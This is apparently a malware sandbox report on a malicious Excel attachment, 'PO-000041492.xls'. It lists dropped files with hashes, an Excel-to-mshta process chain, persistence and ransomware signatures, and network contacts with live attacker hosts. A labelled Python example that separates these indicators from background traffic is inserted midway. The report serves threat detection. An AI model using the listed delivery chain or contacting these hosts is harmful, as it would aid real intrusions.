C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor[1].hta

MD5 db21eb9cf86a8314900d693c5a40c4e9
SHA1 1dd5c5e45f4c0224a6c4f4ce443bcb542fc5913c
SHA256 da1ae3eef8260a07b09c7978317fed23be8c431f2620629a9bc3f170df113102
SHA512 b589c6d47dd7dc29d3e8e6823c68966ee388d5e78fbc5b300abd38829443889591efe774564c861349dcad7b1981f9317b60fb1c19a3b232f12c64e403783f2c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 72dedba1ca2861970a3e96b93b4e916d
SHA1 527c5f09726b73a5b9070675c6d702750bc0868d
SHA256 06a4311011084bdec6fe8eda8c6d1a2681aba0353d4c96a4089dece3c970c911
SHA512 025a3095161c0b2201d544b3819ce70be5bbfe66e69559d46a16e40310731ddcc1e88e92e8276c1b0d754c651a2f2cea95d976adc32ed5c4d46d909e484686dc

\??\c:\Users\Admin\AppData\Local\Temp\qk93a-ep.cmdline

MD5 914e799a7629b8633112a601d2237f0a
SHA1 1fc3870c068b7711356e779c339f77b4f87ac2b2
SHA256 369f707b61aa55c61f51e1bdfc093c2143433f77e74df4716239828363451dfe
SHA512 8d395038e526362427ee80940cc06d374898a401eb28ad65640186f2ffa5af4f0f9dabd915c5c329682c44c4699ad16651661c87f7a7ecebc4c846fd1fd41515

\??\c:\Users\Admin\AppData\Local\Temp\qk93a-ep.0.cs

MD5 f97fc8141f59078b4354b513d3b083ac
SHA1 293904ab8d5f38a2f0764ee2e35e97e590d8c737
SHA256 f6766cc467b91c9c99186a91d4cc32ebf6803b04c9e82ba8dedd54f9dc25b32e
SHA512 87b65e67e76c334c79481d25513fb1696ab86b1d8bf6006b7436a5ba7e522e2101912315c16d92cb0bf0feb86aa9616d5ea1019054c489958ca364947abe879c

\??\c:\Users\Admin\AppData\Local\Temp\CSC5CB.tmp

MD5 86ee229377d5dd9fa4df127e75df942b
SHA1 394242040d8daf6eb739025fef9509df7332ff90
SHA256 385d734cb7169703ba5babe974906acc32f53d066957ab1a7f9f8748fd932a8f
SHA512 95fe81e34756943cf7b1b349ab8ec056bd6005a24bf3a8d8040354b392701a76a045a649c067f2eb8f4895dbc22f18dc0554c7f8a1468f189ad748785951c2d1

C:\Users\Admin\AppData\Local\Temp\RES5CC.tmp

MD5 de45d5adf56769d6f21cbafd15cb93f2
SHA1 e377339bea1681eb06b04b417cdc88afa869f3dc
SHA256 156647b8206c95bc4070b37d85675bd3465fa15a4f1d25e33625c506f9ba0a0e
SHA512 6d5eb4a5db5dc3d5585aba858f8f7186faa3f244308bc4c166e93d49cd83206721fcf280d3220e08f3a85c4139974f4b346cac5fcc263346e578bd8b2cffc330

C:\Users\Admin\AppData\Local\Temp\qk93a-ep.dll

MD5 cb506349d225018a4d8e37d35ce3459b
SHA1 dd76f6a79afd5d2ee943909d55f24325d003d1e7
SHA256 7c4bd4101adbae94f38a08f6f6606559468e544ee16c199da7b49baf093609f7
SHA512 fad78a106a0ebe332c399af7f42a292ea1103783be9a40e41d1b6d7226ba115ccf7bfd1b998a6821c567358c7d97f22a7986a8dffbb47058b3ab550ec198a250

C:\Users\Admin\AppData\Local\Temp\qk93a-ep.pdb

MD5 03f727298ed7d2695597a8d213f2faef
SHA1 d64c77cd944af481fae3f772b8cf8e831d5f6b8d
SHA256 b7151d0620b3dc1991080e325f511f1e129544facb92a76d217b107f92ac25c6
SHA512 0d91fcf894a60bdc26cb8b36dba717ea58512c6d2c6a0dff470bbe68e8a4f3806744e83f2e31271420f4e8f942f9a5d3be5575d805fc44827ee52c14936a69e2

memory/2636-59-0x000000007403D000-0x0000000074048000-memory.dmp

C:\Users\Admin\AppData\Roaming\caspol.exe

MD5 80358303e33cef71434e6e4a621262c5
SHA1 e7a22b4e5af741f9b4d9982f36164b276bba459a
SHA256 f3246d0ca5ca8e69f98ca33b2c17813d5d862049dcfa9931dbcbaaaf7543a1f7
SHA512 5e68b8c63afe7c0e91396f42f485cd84946235ab11d9ce7107bbcf75568ff3087d5e14378f87d77733376e332f516f26db838b870ca580569178b15c0a90761e

memory/968-74-0x0000000000210000-0x00000000002A4000-memory.dmp

memory/968-75-0x0000000000320000-0x0000000000332000-memory.dmp

memory/968-76-0x00000000056C0000-0x0000000005724000-memory.dmp

memory/2292-80-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2292-90-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2292-91-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2292-88-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2292-86-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2292-84-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2292-82-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2292-93-0x0000000000400000-0x00000000004A2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-18 17:47

Reported

2024-11-18 17:50

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-000041492.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4900 wrote to memory of 2512 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 4900 wrote to memory of 2512 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-000041492.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.32.7:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 7.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 link.uebie.de udp
DE 5.45.108.48:443 link.uebie.de tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 48.108.45.5.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 88.221.134.89:80 e6.o.lencr.org tcp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 89.134.221.88.in-addr.arpa udp
US 66.63.187.231:80 66.63.187.231 tcp
US 8.8.8.8:53 231.187.63.66.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
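
The two Network tables mix the sample's own traffic with sandbox and OS background (resolver queries to 8.8.8.8, PTR lookups, OCSP and CRL fetches, Office roaming). The following Python is added here as an example; it is not part of the sandbox report. It parses the rows as printed above, keeps only TCP connections that are not on a background allowlist, and compares the two detonations. The rows are copied from the report (behavioral2 trimmed of its repeated PTR lookups); the allowlist is this example's own choice.

```python
"""Added example (not part of the sandbox report): separate background
traffic from the destinations worth blocking and compare the two
detonations on the page. Rows are copied from the report's Network tables;
the allowlist of background domains is this example's own."""
import re

BEHAVIORAL1 = """
US 8.8.8.8:53 link.uebie.de udp
DE 5.45.108.48:443 link.uebie.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 88.221.135.105:80 e6.o.lencr.org tcp
US 66.63.187.231:80 66.63.187.231 tcp
DE 5.45.108.48:443 link.uebie.de tcp
US 66.63.187.231:80 66.63.187.231 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.252.157:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp
DE 94.156.177.95:80 tcp
DE 94.156.177.95:80 tcp
"""
BEHAVIORAL2 = """
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.32.7:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 link.uebie.de udp
DE 5.45.108.48:443 link.uebie.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 88.221.134.89:80 e6.o.lencr.org tcp
US 66.63.187.231:80 66.63.187.231 tcp
US 8.8.8.8:53 231.187.63.66.in-addr.arpa udp
"""

# Sandbox/OS background seen in these tables: OCSP (lencr.org), CRL and
# homepage fetches (microsoft.com), Office roaming, reverse lookups.
NOISE_SUFFIXES = ("lencr.org", "microsoft.com", "officeapps.live.com", "in-addr.arpa")

# Country Destination[:port] [Domain] Proto; the Domain column may be empty.
ROW = re.compile(
    r"^(?P<cc>[A-Z]{2}) (?P<dest>[\d.]+):(?P<port>\d+)(?: (?P<domain>\S+))? (?P<proto>tcp|udp)$",
    re.M,
)


def is_noise(name):
    return any(name == s or name.endswith("." + s) for s in NOISE_SUFFIXES)


def iocs(table):
    """{(name, 'ip:port')} for every TCP connection not on the allowlist.
    UDP rows here are lookups to the sandbox resolver; a queried domain only
    counts once a TCP connection to its resolved address follows. A TCP row
    with an empty Domain column is a raw-IP connection, so the address itself
    is the name."""
    out = set()
    for m in ROW.finditer(table):
        if m["proto"] != "tcp":
            continue
        name = m["domain"] or m["dest"]
        if not is_noise(name):
            out.add((name, f"{m['dest']}:{m['port']}"))
    return out


def compare(run_a, run_b):
    """Destinations contacted in both runs versus only one of them."""
    a, b = iocs(run_a), iocs(run_b)
    return {"both": a & b, "only_a": a - b, "only_b": b - a}


if __name__ == "__main__":
    for key, val in compare(BEHAVIORAL1, BEHAVIORAL2).items():
        print(key, sorted(val))
```

link.uebie.de and 66.63.187.231 are reached by both detonations, while 94.156.177.95:80 appears only in behavioral1, the run in which caspol.exe was actually dropped and executed; comparing runs this way shows which indicators come from the document stage and which only appear once the payload is live.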

Files

memory/4900-0-0x00007FFCAD6D0000-0x00007FFCAD6E0000-memory.dmp

memory/4900-2-0x00007FFCAD6D0000-0x00007FFCAD6E0000-memory.dmp

memory/4900-1-0x00007FFCED6ED000-0x00007FFCED6EE000-memory.dmp

memory/4900-3-0x00007FFCAD6D0000-0x00007FFCAD6E0000-memory.dmp

memory/4900-4-0x00007FFCAD6D0000-0x00007FFCAD6E0000-memory.dmp

memory/4900-5-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-6-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-7-0x00007FFCAD6D0000-0x00007FFCAD6E0000-memory.dmp

memory/4900-10-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-9-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-8-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-11-0x00007FFCAB180000-0x00007FFCAB190000-memory.dmp

memory/4900-12-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-13-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-14-0x00007FFCAB180000-0x00007FFCAB190000-memory.dmp

memory/4900-15-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-17-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-20-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-22-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-21-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-19-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-18-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-16-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/2512-42-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/2512-47-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-49-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-50-0x00007FFCED6ED000-0x00007FFCED6EE000-memory.dmp

memory/4900-51-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/4900-52-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/2512-56-0x00007FFCED650000-0x00007FFCED845000-memory.dmp

memory/2512-57-0x00007FF71B540000-0x00007FF71B548000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 53f5cc349c48d618cb6f424053c93e2f
SHA1 1bc41fd2c400f577eb582137b518a3e7d5974a90
SHA256 930dabe78b62d9f5349ec459392e91c536ae8c001958a68548c6123325ec954a
SHA512 8c143bf58bb9185fec0403639f0dfa93bb22b0bcbdc5b26b8222f1961ffe602516ef2ff3251f91f4e4969ef7ff06b3efe860e559b463ed02ca3348873bde2bbf